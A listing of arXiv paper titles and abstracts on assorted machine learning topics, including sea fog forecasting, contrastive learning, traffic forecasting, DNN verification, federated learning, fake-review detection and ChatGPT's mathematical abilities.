    Accurate and timely prediction of sea fog is very important for effectively managing maritime and coastal economic activities. Given the intricate nature and inherent variability of sea fog, traditional numerical and statistical forecasting methods often prove inadequate. This study aims to develop an advanced sea fog forecasting method embedded in a numerical weather prediction model, using the Yangtze River Estuary (YRE) coastal area as a case study. Prior to training our machine learning model, we employ a time-lagged correlation analysis technique to identify key predictors and decipher the underlying mechanisms driving sea fog occurrence. In addition, we implement ensemble learning and a focal loss function to address the issue of imbalanced data, thereby enhancing the predictive ability of our model. To verify the accuracy of our method, we evaluate its performance using a comprehensive dataset spanning one year, which encompasses both weather station observations and historical forecasts. Remarkably, our machine learning-based approach surpasses the predictive performance of two conventional methods, the weather research and forecasting nonhydrostatic mesoscale model (WRF-NMM) and the algorithm developed by the National Oceanic and Atmospheric Administration (NOAA) Forecast Systems Laboratory (FSL). Specifically, with regard to predicting sea fog with a visibility of less than or equal to 1 km with a lead time of 60 hours, our methodology achieves superior results by increasing the probability of detection (POD) while simultaneously reducing the false alarm ratio (FAR).
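The focal loss mentioned above handles class imbalance by down-weighting easy, well-classified examples so that rare events (here, fog occurrences) dominate training. A generic binary sketch; the paper's exact class weighting is an assumption on our part:

```python
import math

def focal_loss(p, y, gamma=2.0, alpha=0.25):
    """Binary focal loss: the (1 - p_t)^gamma factor shrinks the loss of
    confident, correct predictions so rare positives drive the gradient.
    Generic sketch with standard default hyperparameters."""
    p_t = p if y == 1 else 1.0 - p          # probability of the true class
    a_t = alpha if y == 1 else 1.0 - alpha  # class-balance weight
    return -a_t * (1.0 - p_t) ** gamma * math.log(p_t)

easy = focal_loss(0.95, 1)   # confident, correct positive: near-zero loss
hard = focal_loss(0.10, 1)   # badly missed positive: large loss
print(easy, hard)
```

With gamma = 0 and alpha = 0.5 this reduces to (half of) ordinary cross-entropy; increasing gamma widens the gap between easy and hard examples.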
    MetaMask: Revisiting Dimensional Confounder for Self-Supervised Learning. (arXiv:2209.07902v4 [cs.LG] UPDATED)
    As a successful approach to self-supervised learning, contrastive learning aims to learn invariant information shared among distortions of the input sample. While contrastive learning has yielded continuous advancements in sampling strategy and architecture design, it still suffers from two persistent defects: the interference of task-irrelevant information and sample inefficiency, which are related to the recurring existence of trivial constant solutions. From the perspective of dimensional analysis, we find that dimensional redundancy and the dimensional confounder are the intrinsic issues behind these phenomena, and provide experimental evidence to support our viewpoint. We further propose a simple yet effective approach, MetaMask, short for the dimensional Mask learned by Meta-learning, to learn representations against dimensional redundancy and the confounder. MetaMask adopts the redundancy-reduction technique to tackle the dimensional redundancy issue and innovatively introduces a dimensional mask to reduce the gradient effects of specific dimensions containing the confounder, which is trained by employing a meta-learning paradigm with the objective of improving the performance of masked representations on a typical self-supervised task. We provide solid theoretical analyses to prove MetaMask can obtain tighter risk bounds for downstream classification compared to typical contrastive methods. Empirically, our method achieves state-of-the-art performance on various benchmarks.
    Can point cloud networks learn statistical shape models of anatomies?. (arXiv:2305.05610v2 [cs.CV] UPDATED)
    Statistical Shape Modeling (SSM) is a valuable tool for investigating and quantifying anatomical variations within populations of anatomies. However, traditional correspondence-based SSM generation methods have a prohibitive inference process and require complete geometric proxies (e.g., high-resolution binary volumes or surface meshes) as input shapes to construct the SSM. Unordered 3D point cloud representations of shapes are more easily acquired from various medical imaging practices (e.g., thresholded images and surface scanning). Point cloud deep networks have recently achieved remarkable success in learning permutation-invariant features for different point cloud tasks (e.g., completion, semantic segmentation, classification). However, their application to learning SSM from point clouds is to date unexplored. In this work, we demonstrate that existing point cloud encoder-decoder-based completion networks offer untapped potential for SSM, capturing population-level statistical representations of shapes while reducing the inference burden and relaxing the input requirement. We discuss the limitations of these techniques with respect to the SSM application and suggest future improvements. Our work paves the way for further exploration of point cloud deep learning for SSM, a promising avenue for advancing shape analysis literature and broadening SSM to diverse use cases.
    From Graph Generation to Graph Classification. (arXiv:2302.07989v2 [cs.LG] UPDATED)
    This note describes a new approach to classifying graphs that leverages graph generative models (GGM). Assuming a GGM that defines a joint probability distribution over graphs and their class labels, I derive classification formulas for the probability of a class label given a graph. A new conditional ELBO can be used to train a generative graph auto-encoder model for discrimination. While leveraging generative models for classification has been well explored for non-relational i.i.d. data, to my knowledge it is a novel approach to graph classification.
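The underlying classification rule is Bayes' theorem applied to class-conditional generative models: p(y | G) ∝ p(G | y) p(y). A minimal sketch of that rule, where the per-class log-likelihoods are toy numbers standing in for what a trained GGM would supply:

```python
import math

def generative_classify(log_lik, log_prior):
    """Bayes-rule classification from class-conditional generative models:
    p(y | x) ∝ p(x | y) p(y). In the note the likelihoods come from a graph
    generative model; here they are toy placeholder values."""
    scores = [l + p for l, p in zip(log_lik, log_prior)]
    m = max(scores)                              # log-sum-exp for stability
    w = [math.exp(s - m) for s in scores]
    total = sum(w)
    return [x / total for x in w]

# Two classes, uniform prior: the model likes the graph more under class 1
post = generative_classify(log_lik=[-10.0, -8.0],
                           log_prior=[math.log(0.5)] * 2)
print(post)   # posterior favors class 1
```

A 2-nat log-likelihood gap translates to a posterior of about 0.88 for the preferred class under a uniform prior.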
    PGCN: Progressive Graph Convolutional Networks for Spatial-Temporal Traffic Forecasting. (arXiv:2202.08982v2 [cs.LG] UPDATED)
    The complex spatial-temporal correlations in transportation networks make the traffic forecasting problem challenging. Since transportation systems inherently possess graph structures, much research effort has been devoted to graph neural networks. Recently, constructing graphs that adapt to the data has shown promising results over models relying on a single static graph structure. However, the graph adaptations are applied during the training phase and do not reflect the data used during the testing phase. Such shortcomings can be problematic, especially in traffic forecasting, since traffic data often suffers from unexpected changes and irregularities in the time series. In this study, we propose a novel traffic forecasting framework called Progressive Graph Convolutional Network (PGCN). PGCN constructs a set of graphs by progressively adapting to input data during both the training and testing phases. Specifically, the model constructs progressive adjacency matrices by learning trend similarities among graph nodes. The model is then combined with dilated causal convolution and a gated activation unit to extract temporal features. With residual and skip connections, PGCN performs the traffic prediction. When applied to four real-world traffic datasets of diverse geometric nature, the proposed model achieves state-of-the-art performance with consistency across all datasets. We conclude that the ability of PGCN to progressively adapt to input data enables the model to generalize to different study sites with robustness.
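The core building block, an adjacency matrix derived from trend similarity among node time series, can be sketched with plain correlation of first differences. This similarity measure is an assumption for illustration; PGCN learns its own.

```python
import numpy as np

def trend_adjacency(window):
    """Build an adjacency matrix from trend similarity among node time
    series -- the idea PGCN applies progressively at both training and
    testing time. Pearson correlation of first differences is a stand-in
    here; the paper learns the similarity instead."""
    trends = np.diff(window, axis=1)        # per-node trend (change) series
    A = np.corrcoef(trends)
    np.fill_diagonal(A, 0.0)                # no self-loops
    return np.maximum(A, 0.0)               # keep positively correlated pairs

window = np.array([[1.0, 2.0, 4.0, 3.0],    # node 0
                   [0.0, 1.0, 3.0, 2.0],    # node 1: identical trend to node 0
                   [4.0, 3.0, 1.0, 2.0]])   # node 2: opposite trend
A = trend_adjacency(window)
print(A)   # nodes 0 and 1 strongly connected; node 2 isolated
```

Recomputing this matrix on each incoming window is what lets the graph track the data at test time rather than being frozen after training.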
    Conditional expectation network for SHAP. (arXiv:2307.10654v1 [cs.LG])
    A very popular model-agnostic technique for explaining predictive models is the SHapley Additive exPlanation (SHAP). The two most popular versions of SHAP are a conditional expectation version and an unconditional expectation version (the latter is also known as interventional SHAP). Except for tree-based methods, usually the unconditional version is used (for computational reasons). We provide a (surrogate) neural network approach which allows us to efficiently calculate the conditional version for both neural networks and other regression models, and which properly considers the dependence structure in the feature components. This proposal is also useful for providing drop1 and ANOVA analyses in complex regression models, similar to their generalized linear model (GLM) counterparts, and we provide a partial dependence plot (PDP) counterpart that considers the right dependence structure in the feature components.
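For context, the unconditional (interventional) version the paper contrasts with can be computed exactly for tiny models by averaging marginal contributions over all feature orderings, with absent features set to a background value. The sketch below shows that baseline; it does not capture the conditional version, which is the paper's contribution.

```python
from itertools import permutations
from math import factorial

def interventional_shap(f, x, background):
    """Exact interventional (unconditional) SHAP for a small model: average
    each feature's marginal contribution over all orderings, replacing
    absent features with a single background point. Ignores feature
    dependence -- precisely what conditional SHAP fixes."""
    n = len(x)
    phi = [0.0] * n
    for order in permutations(range(n)):
        z = list(background)
        prev = f(z)
        for i in order:            # reveal features one at a time
            z[i] = x[i]
            cur = f(z)
            phi[i] += cur - prev
            prev = cur
    return [p / factorial(n) for p in phi]

f = lambda z: 2 * z[0] + 3 * z[1]          # toy linear model
phi = interventional_shap(f, x=[1.0, 1.0], background=[0.0, 0.0])
print(phi)   # [2.0, 3.0]: for a linear model, coefficient times deviation
```

For correlated features the two versions disagree, which is why a cheap surrogate for the conditional expectation is valuable.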
    Optimizing PatchCore for Few/many-shot Anomaly Detection. (arXiv:2307.10792v1 [cs.CV])
    Few-shot anomaly detection (AD) is an emerging sub-field of general AD, and tries to distinguish between normal and anomalous data using only few selected samples. While newly proposed few-shot AD methods do compare against pre-existing algorithms developed for the full-shot domain as baselines, they do not dedicatedly optimize them for the few-shot setting. It thus remains unclear if the performance of such pre-existing algorithms can be further improved. We address said question in this work. Specifically, we present a study on the AD/anomaly segmentation (AS) performance of PatchCore, the current state-of-the-art full-shot AD/AS algorithm, in both the few-shot and the many-shot settings. We hypothesize that further performance improvements can be realized by (I) optimizing its various hyperparameters, and by (II) transferring techniques known to improve few-shot supervised learning to the AD domain. Exhaustive experiments on the public VisA and MVTec AD datasets reveal that (I) significant performance improvements can be realized by optimizing hyperparameters such as the underlying feature extractor, and that (II) image-level augmentations can, but are not guaranteed to, improve performance. Based on these findings, we achieve a new state of the art in few-shot AD on VisA, further demonstrating the merit of adapting pre-existing AD/AS methods to the few-shot setting. Lastly, we identify the investigation of feature extractors with a strong inductive bias as a potential future research direction for (few-shot) AD/AS.
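PatchCore's scoring rule is simple to sketch: an image is scored by the largest nearest-neighbor distance between any of its patch features and a memory bank of normal patch features. The real algorithm adds a pretrained feature extractor and coreset subsampling, both omitted from this toy version.

```python
import numpy as np

def anomaly_score(test_feats, memory_bank):
    """PatchCore-style image score: the largest nearest-neighbor distance
    from any test patch feature to the memory bank of normal features.
    Toy sketch -- no feature extractor, no coreset subsampling."""
    # pairwise Euclidean distances: (num_test_patches, num_memory_patches)
    d = np.linalg.norm(test_feats[:, None, :] - memory_bank[None, :, :], axis=2)
    return d.min(axis=1).max()     # worst patch, best-matching memory entry

memory = np.array([[0.0, 0.0], [1.0, 1.0]])   # "normal" patch features
normal = np.array([[0.1, 0.0], [0.9, 1.0]])    # close to the memory bank
anomalous = np.array([[0.1, 0.0], [5.0, 5.0]]) # one far-off patch
print(anomaly_score(normal, memory), anomaly_score(anomalous, memory))
```

In the few-shot setting the memory bank is built from only a handful of normal images, which is why the choice of feature extractor matters so much.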
    Leveraging Offline Data in Online Reinforcement Learning. (arXiv:2211.04974v2 [cs.LG] UPDATED)
    Two central paradigms have emerged in the reinforcement learning (RL) community: online RL and offline RL. In the online RL setting, the agent has no prior knowledge of the environment, and must interact with it in order to find an $\epsilon$-optimal policy. In the offline RL setting, the learner instead has access to a fixed dataset to learn from, but is unable to otherwise interact with the environment, and must obtain the best policy it can from this offline data. Practical scenarios often motivate an intermediate setting: if we have some set of offline data and, in addition, may also interact with the environment, how can we best use the offline data to minimize the number of online interactions necessary to learn an $\epsilon$-optimal policy? In this work, we consider this setting, which we call the \textsf{FineTuneRL} setting, for MDPs with linear structure. We characterize the necessary number of online samples needed in this setting given access to some offline dataset, and develop an algorithm, \textsc{FTPedel}, which is provably optimal, up to $H$ factors. We show through an explicit example that combining offline data with online interactions can lead to a provable improvement over either purely offline or purely online RL. Finally, our results illustrate the distinction between \emph{verifiable} learning, the typical setting considered in online RL, and \emph{unverifiable} learning, the setting often considered in offline RL, and show that there is a formal separation between these regimes.
    A DPLL(T) Framework for Verifying Deep Neural Networks. (arXiv:2307.10266v1 [cs.LG])
    Deep Neural Networks (DNNs) have emerged as an effective approach to tackling real-world problems. However, like human-written software, automatically-generated DNNs can have bugs and be attacked. This has attracted much recent interest in developing effective and scalable DNN verification techniques and tools. In this work, we introduce NeuralSAT, a new constraint-solving approach to DNN verification. The design of NeuralSAT follows the DPLL(T) algorithm used in modern SMT solving, which includes (conflict) clause learning, abstraction, and theory solving; NeuralSAT can thus be considered an SMT framework for DNNs. Preliminary results show that the NeuralSAT prototype is competitive with the state of the art. We hope, with proper optimization and engineering, NeuralSAT will carry the power and success of modern SAT/SMT solvers to DNN verification. NeuralSAT is available at: https://github.com/dynaroars/neuralsat-solver
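A standard abstraction used inside DNN verifiers (and a plausible building block for the theory-solving step, though NeuralSAT's actual abstraction and DPLL(T) loop are more involved) is interval bound propagation: pushing input intervals through affine and ReLU layers to bound the output. A minimal sketch:

```python
import numpy as np

def interval_bounds(layers, lo, hi):
    """Interval bound propagation through affine + ReLU layers -- a common
    abstraction in DNN verification. Illustrative only; not NeuralSAT's
    actual procedure."""
    for W, b in layers:
        Wp, Wn = np.maximum(W, 0), np.minimum(W, 0)
        # positive weights pair lo with lo, negative weights flip the bounds
        lo, hi = Wp @ lo + Wn @ hi + b, Wp @ hi + Wn @ lo + b
        lo, hi = np.maximum(lo, 0), np.maximum(hi, 0)   # ReLU
    return lo, hi

# One neuron computing ReLU(x1 - x2) over the unit box [0,1]^2
layers = [(np.array([[1.0, -1.0]]), np.array([0.0]))]
lo, hi = interval_bounds(layers, np.array([0.0, 0.0]), np.array([1.0, 1.0]))
print(lo, hi)   # output provably lies in [0, 1]
```

If the certified output interval already satisfies the property being checked, the solver can close that branch without case-splitting on neuron activations.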
    Tuning Stochastic Gradient Algorithms for Statistical Inference via Large-Sample Asymptotics. (arXiv:2207.12395v3 [stat.CO] UPDATED)
    The tuning of stochastic gradient algorithms (SGAs) for optimization and sampling is often based on heuristics and trial-and-error rather than generalizable theory. We address this theory--practice gap by characterizing the large-sample statistical asymptotics of SGAs via a joint step-size--sample-size scaling limit. We show that iterate averaging with a large fixed step size is robust to the choice of tuning parameters and asymptotically has covariance proportional to that of the MLE sampling distribution. We also prove a Bernstein--von Mises-like theorem to guide tuning, including for generalized posteriors that are robust to model misspecification. Numerical experiments validate our results and recommendations in realistic finite-sample regimes. Our work lays the foundation for a systematic analysis of other stochastic gradient Markov chain Monte Carlo algorithms for a wide range of models.
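    The central tuning recommendation above can be illustrated with a toy sketch (this is not the paper's algorithm; the quadratic objective, step size, and noise model are all invented for illustration): SGD with a large fixed step size produces iterates that keep oscillating, yet their running (Polyak) average concentrates near the optimum.

```python
import numpy as np

# Illustrative sketch: SGD with a large *fixed* step size on a noisy quadratic.
# The raw iterate fluctuates, but the running average converges to the optimum.
rng = np.random.default_rng(0)
theta_star = 3.0          # optimum of f(x) = 0.5 * (x - theta_star)^2
step = 0.5                # deliberately large, fixed step size
theta, avg = 0.0, 0.0
for t in range(1, 20001):
    grad = (theta - theta_star) + rng.normal(scale=1.0)  # noisy gradient
    theta -= step * grad
    avg += (theta - avg) / t                             # running Polyak average

print(abs(avg - theta_star))    # small: the average is close to the optimum
print(abs(theta - theta_star))  # the last iterate still fluctuates
```

Despite the large step size, the averaged iterate is robust, matching the tuning guidance in the abstract.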
    Blockchain-Based Federated Learning: Incentivizing Data Sharing and Penalizing Dishonest Behavior. (arXiv:2307.10492v1 [cs.LG])
    With data sharing becoming increasingly important for collaboration and innovation, it is essential that data be managed and shared in a secure and trustworthy manner. Data governance is a common approach to managing data, but it faces many challenges, such as data silos, data consistency, privacy, security, and access control. To address these challenges, this paper proposes a comprehensive framework that integrates data trust in federated learning with the InterPlanetary File System, blockchain, and smart contracts to facilitate secure and mutually beneficial data sharing while providing incentives and access control mechanisms and penalizing dishonest behavior. The experimental results demonstrate that the proposed model is effective in improving the accuracy of federated learning models while ensuring the security and fairness of the data-sharing process. The paper also presents a decentralized federated learning platform that successfully trained a CNN model on the MNIST dataset using blockchain technology. The platform enables multiple workers to train the model simultaneously while maintaining data privacy and security. The decentralized architecture and use of blockchain technology allow for efficient communication and coordination between workers. This platform has the potential to facilitate decentralized machine learning and support privacy-preserving collaboration in various domains.
    Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning. (arXiv:2307.10274v1 [eess.AS])
    In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability generalizes to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, reaching a WER reduction of up to 29% on the medical conversation dataset.
    IncDSI: Incrementally Updatable Document Retrieval. (arXiv:2307.10323v1 [cs.IR])
    The Differentiable Search Index is a recently proposed paradigm for document retrieval that encodes information about a corpus of documents within the parameters of a neural network and directly maps queries to corresponding documents. These models have achieved state-of-the-art performance for document retrieval across many benchmarks. However, they have a significant limitation: it is not easy to add new documents after the model is trained. We propose IncDSI, a method to add documents in real time (about 20-50 ms per document) without retraining the model on the entire dataset (or even parts thereof). Instead, we formulate the addition of documents as a constrained optimization problem that makes minimal changes to the network parameters. Although orders of magnitude faster, our approach is competitive with retraining the model on the whole dataset, and it enables the development of document retrieval systems that can be updated with new information in real time. Our code for IncDSI is available at https://github.com/varshakishore/IncDSI.
    A Machine Learning based Empirical Evaluation of Cyber Threat Actors High Level Attack Patterns over Low level Attack Patterns in Attributing Attacks. (arXiv:2307.10252v1 [cs.CR])
    Cyber threat attribution is the process of identifying the actor behind an attack incident in cyberspace. Accurate and timely threat attribution plays an important role in deterring future attacks through appropriate and timely defense mechanisms. Manual analysis of attack patterns gathered from honeypot deployments, intrusion detection systems, firewalls, and trace-back procedures remains security analysts' preferred method for cyber threat attribution. Such attack patterns are low-level Indicators of Compromise (IOCs). They represent the Tactics, Techniques, and Procedures (TTPs) and software tools used by adversaries in their campaigns. Adversaries rarely reuse them, and they can be manipulated, resulting in false and unfair attribution. Empirically evaluating and comparing the effectiveness of both kinds of IOC requires addressing two problems. First, recent research has discussed the ineffectiveness of low-level IOCs for cyber threat attribution only intuitively; an empirical evaluation of their effectiveness on a real-world dataset is missing. Second, the available dataset for high-level IOCs has a single instance for each predictive class label and therefore cannot be used directly to train machine learning models. To address these problems, we empirically evaluate the effectiveness of low-level IOCs on a real-world dataset built specifically for comparative analysis with high-level IOCs. The experimental results show that models trained on high-level IOCs attribute cyberattacks with an accuracy of 95%, compared to 40% for models trained on low-level IOCs.
    Fairness in AI and Its Long-Term Implications on Society. (arXiv:2304.09826v2 [cs.CY] UPDATED)
    Successful deployment of artificial intelligence (AI) in various settings has led to numerous positive outcomes for individuals and society. However, AI systems have also been shown to harm parts of the population due to biased predictions. AI fairness focuses on mitigating such biases to ensure AI decision making is not discriminatory towards certain groups. We take a closer look at AI fairness and analyze how lack of AI fairness can lead to deepening of biases over time and act as a social stressor. More specifically, we discuss how biased models can lead to more negative real-world outcomes for certain groups, which may then become more prevalent by deploying new AI models trained on increasingly biased data, resulting in a feedback loop. If the issues persist, they could be reinforced by interactions with other risks and have severe implications on society in the form of social unrest. We examine current strategies for improving AI fairness, assess their limitations in terms of real-world deployment, and explore potential paths forward to ensure we reap AI's benefits without causing society's collapse.
    Detecting deceptive reviews using text classification. (arXiv:2307.10617v1 [cs.IR])
    In recent years, online reviews have played a vital role in promoting products and services. Businesses may embed fake reviews to attract customers, highlighting the benefits of their own products or criticizing a competitor's. Marketers, advertisers, and other online business users thus have an incentive to create fake positive reviews for products they want to promote and fake negative reviews for competing products. Identifying deceptive reviews is therefore an active and ongoing research area. This paper proposes a machine learning approach to identifying deceptive reviews. We investigate the performance of several experiments on the Deceptive Opinion Spam Corpus, a dataset of restaurant reviews. We develop an n-gram model with max features to identify deceptive content, with a particular focus on fake reviews. Further, we conduct a benchmark study of two feature-extraction techniques combined with five machine learning classifiers. The experimental results show that the passive-aggressive classifier outperforms the other algorithms, reaching the highest accuracy on both general text classification and fake-review detection. We also study data augmentation and implement several deep learning techniques.
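    The n-gram features the abstract mentions can be sketched in a few lines (the tokenizer, function name, and example strings below are illustrative, not the paper's code):

```python
from collections import Counter

def ngram_features(text, n=2):
    """Count word n-grams in a review -- a minimal sketch of the kind of
    n-gram count features fed to a text classifier."""
    tokens = text.lower().split()
    return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

suspicious = "best best best product ever ever"
ordinary = "the delivery was late but the food was decent"
print(ngram_features(suspicious))
print(ngram_features(ordinary))
```

In practice such counts would be vectorized (e.g., with a fixed vocabulary and a max-features cap) before training a classifier such as the passive-aggressive one evaluated in the paper.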
    Exploring Link Prediction over Hyper-Relational Temporal Knowledge Graphs Enhanced with Time-Invariant Relational Knowledge. (arXiv:2307.10219v1 [cs.AI])
    Stemming from traditional knowledge graphs (KGs), hyper-relational KGs (HKGs) provide additional key-value pairs (i.e., qualifiers) for each KG fact that help to better restrict the fact's validity. In recent years, there has been increasing interest in studying graph reasoning over HKGs. In the meantime, due to the ever-evolving nature of world knowledge, extensive parallel work has focused on reasoning over temporal KGs (TKGs), where each TKG fact can be viewed as a KG fact coupled with a timestamp (or time period) specifying its time validity. Existing HKG reasoning approaches do not consider temporal information because it is not explicitly specified in previous benchmark datasets. Moreover, all previous TKG reasoning methods emphasize only temporal reasoning and have no way to learn from qualifiers. To this end, we aim to fill the gap between TKG reasoning and HKG reasoning. We develop two new benchmark hyper-relational TKG (HTKG) datasets, Wiki-hy and YAGO-hy, and propose an HTKG reasoning model that efficiently models both temporal facts and qualifiers. We further exploit additional time-invariant relational knowledge from the Wikidata knowledge base and study its effectiveness in HTKG reasoning. Time-invariant relational knowledge is knowledge that remains unchanged over time (e.g., Sasha Obama is the child of Barack Obama), and it has never been fully explored in previous TKG reasoning benchmarks and approaches. Experimental results show that our model substantially outperforms previous related methods on HTKG link prediction and can be further enhanced by jointly leveraging both temporal and time-invariant relational knowledge.
    Mathematical Capabilities of ChatGPT. (arXiv:2301.13867v2 [cs.LG] UPDATED)
    We investigate the mathematical capabilities of two iterations of ChatGPT (released 9-January-2023 and 30-January-2023) and of GPT-4 by testing them on publicly available datasets, as well as hand-crafted ones, using a novel methodology. In contrast to formal mathematics, where large databases of formal proofs are available (e.g., the Lean Mathematical Library), current datasets of natural-language mathematics, used to benchmark language models, either cover only elementary mathematics or are very small. We address this by publicly releasing two new datasets: GHOSTS and miniGHOSTS. These are the first natural-language datasets curated by working researchers in mathematics that (1) aim to cover graduate-level mathematics, (2) provide a holistic overview of the mathematical capabilities of language models, and (3) distinguish multiple dimensions of mathematical reasoning. These datasets also test whether ChatGPT and GPT-4 can be helpful assistants to professional mathematicians by emulating use cases that arise in the daily professional activities of mathematicians. We benchmark the models on a range of fine-grained performance metrics. For advanced mathematics, this is the most detailed evaluation effort to date. We find that ChatGPT can be used most successfully as a mathematical assistant for querying facts, acting as a mathematical search engine and knowledge base interface. GPT-4 can additionally be used for undergraduate-level mathematics but fails on graduate-level difficulty. Contrary to many positive reports in the media about GPT-4 and ChatGPT's exam-solving abilities (a potential case of selection bias), their overall mathematical performance is well below the level of a graduate student. Hence, if your goal is to use ChatGPT to pass a graduate-level math exam, you would be better off copying from your average peer!
    Self-paced Weight Consolidation for Continual Learning. (arXiv:2307.10845v1 [cs.LG])
    Continual learning algorithms that keep the parameters of new tasks close to those of previous tasks are popular for preventing catastrophic forgetting in sequential task learning settings. However, 1) the performance of the new continual learner degrades without distinguishing the contributions of previously learned tasks; and 2) the computational cost grows greatly with the number of tasks, since most existing algorithms need to regularize all previous tasks when learning new ones. To address these challenges, we propose a self-paced Weight Consolidation (spWC) framework that attains robust continual learning by evaluating the discriminative contributions of previous tasks. Specifically, we develop a self-paced regularization that reflects the priorities of past tasks by measuring their difficulty via a key performance indicator (i.e., accuracy). When encountering a new task, all previous tasks are sorted from "difficult" to "easy" based on these priorities. The parameters of the new continual learner are then learned by selectively retaining knowledge from the more difficult past tasks, which overcomes catastrophic forgetting at a lower computational cost. We adopt an alternating convex search to iteratively update the model parameters and priority weights in the bi-convex formulation. The proposed spWC framework is plug-and-play and applicable to most continual learning algorithms (e.g., EWC, MAS, and RCIL) across different tasks (e.g., classification and segmentation). Experimental results on several public benchmark datasets demonstrate that our framework effectively improves performance compared with other popular continual learning algorithms.
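    The regularization idea can be sketched as a weighted quadratic penalty over previous tasks' parameters, in the spirit of EWC-style consolidation (the priorities below are hand-set for illustration; spWC derives them from measured task difficulty):

```python
import numpy as np

def consolidation_loss(theta, prev_params, priorities):
    """Sum of per-task quadratic penalties, each scaled by that task's
    priority weight, keeping theta close to the parameters of past tasks."""
    return sum(p * np.sum((theta - old) ** 2)
               for old, p in zip(prev_params, priorities))

prev = [np.array([1.0, 0.0]), np.array([0.0, 1.0])]
weights = [2.0, 0.5]              # the "difficult" past task gets higher weight
theta = np.array([0.5, 0.5])
print(consolidation_loss(theta, prev, weights))  # → 1.25
```

The total training objective would add this penalty to the new task's loss; a higher-priority (more difficult) past task pulls the new parameters more strongly toward its own.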
    SC VALL-E: Style-Controllable Zero-Shot Text to Speech Synthesizer. (arXiv:2307.10550v1 [cs.SD])
    Expressive speech synthesis models are trained by adding corpora with diverse speakers, various emotions, and different speaking styles to the dataset, in order to control various characteristics of speech and generate the desired voice. In this paper, we propose a style-control (SC) VALL-E model based on the neural codec language model VALL-E, which follows the structure of the generative pre-trained transformer 3 (GPT-3). The proposed SC VALL-E takes text sentences and prompt audio as input and is designed to generate controllable speech, not by simply mimicking the characteristics of the prompt audio but by controlling attributes to produce diverse voices. We identify tokens in the style embedding matrix of the newly designed style network that represent attributes such as emotion, speaking rate, pitch, and voice intensity, and design a model that can control these attributes. To evaluate the performance of SC VALL-E, we conduct comparative experiments with three representative expressive speech synthesis models: global style token (GST) Tacotron2, variational autoencoder (VAE) Tacotron2, and the original VALL-E. We measure word error rate (WER), F0 voiced error (FVE), and F0 gross pitch error (F0GPE) to assess the accuracy of generated sentences. To compare the quality of synthesized speech, we measure comparative mean opinion score (CMOS) and similarity mean opinion score (SMOS). To evaluate the style control ability of the generated speech, we observe the changes in F0 and the mel-spectrogram when modifying the trained tokens. When using prompt audio that is not present in the training data, SC VALL-E generates a variety of expressive sounds and demonstrates competitive performance compared to the existing models. Our implementation, pretrained models, and audio samples are available on GitHub.
    Forecasting Battery Electric Vehicle Charging Behavior: A Deep Learning Approach Equipped with Micro-Clustering and SMOTE Techniques. (arXiv:2307.10588v1 [cs.LG])
    Energy systems, climate change, and public health are among the primary reasons for moving toward electrification in transportation. Transportation electrification is being promoted worldwide to reduce emissions, and as a result many automakers will soon make only battery electric vehicles (BEVs). BEV adoption rates are rising in California, mainly due to climate change and air pollution concerns. While great for climate and pollution goals, improperly managed BEV charging can lead to insufficient charging infrastructure and power outages. This study develops a novel Micro-Clustering Deep Neural Network (MCDNN), an artificial neural network algorithm that is highly effective at learning from BEV trip and charging data to forecast BEV charging events, information that is essential for electricity load aggregators and utility managers to provide charging stations and electricity capacity effectively. The MCDNN is configured using a robust dataset of trips and charges that occurred in California between 2015 and 2020 from 132 BEVs spanning 5 BEV models, for a total of 1,570,167 vehicle miles traveled. The numerical findings reveal that the proposed MCDNN is more effective at predicting charging events than benchmark approaches in this field, such as support vector machines, k-nearest neighbors, decision trees, and other neural network-based models.
    Fairness-Aware Client Selection for Federated Learning. (arXiv:2307.10738v1 [cs.LG])
    Federated learning (FL) has enabled multiple data owners (a.k.a. FL clients) to train machine learning models collaboratively without revealing private data. Since the FL server can only engage a limited number of clients in each training round, FL client selection has become an important research problem. Existing approaches generally focus on either enhancing FL model performance or enhancing the fair treatment of FL clients. The problem of balancing performance and fairness considerations when selecting FL clients remains open. To address this problem, we propose the Fairness-aware Federated Client Selection (FairFedCS) approach. Based on Lyapunov optimization, it dynamically adjusts FL clients' selection probabilities by jointly considering their reputations, times of participation in FL tasks and contributions to the resulting model performance. By not using threshold-based reputation filtering, it provides FL clients with opportunities to redeem their reputations after a perceived poor performance, thereby further enhancing fair client treatment. Extensive experiments based on real-world multimedia datasets show that FairFedCS achieves 19.6% higher fairness and 0.73% higher test accuracy on average than the best-performing state-of-the-art approach.
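    A rough illustration of threshold-free, score-proportional client selection (this is not FairFedCS's Lyapunov-based rule; the scoring formula and inputs are invented for the sketch) shows why every client keeps a nonzero chance of selection:

```python
def selection_probs(reputation, participation, contribution, eps=1e-6):
    """Turn per-client scores combining reputation, participation count, and
    contribution into selection probabilities. No hard reputation threshold:
    every client gets a strictly positive probability (floored at eps)."""
    scores = [max(r * c / (1 + p), eps)   # fewer past selections => higher score
              for r, p, c in zip(reputation, participation, contribution)]
    total = sum(scores)
    return [s / total for s in scores]

probs = selection_probs(reputation=[0.9, 0.2, 0.6],
                        participation=[5, 1, 0],
                        contribution=[0.8, 0.5, 0.7])
print(probs)  # all positive, summing to 1
```

Because no client is filtered out by a reputation threshold, a client with a temporarily poor reputation can still be selected and redeem itself, as the abstract describes.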
    Music Genre Classification with ResNet and Bi-GRU Using Visual Spectrograms. (arXiv:2307.10773v1 [cs.SD])
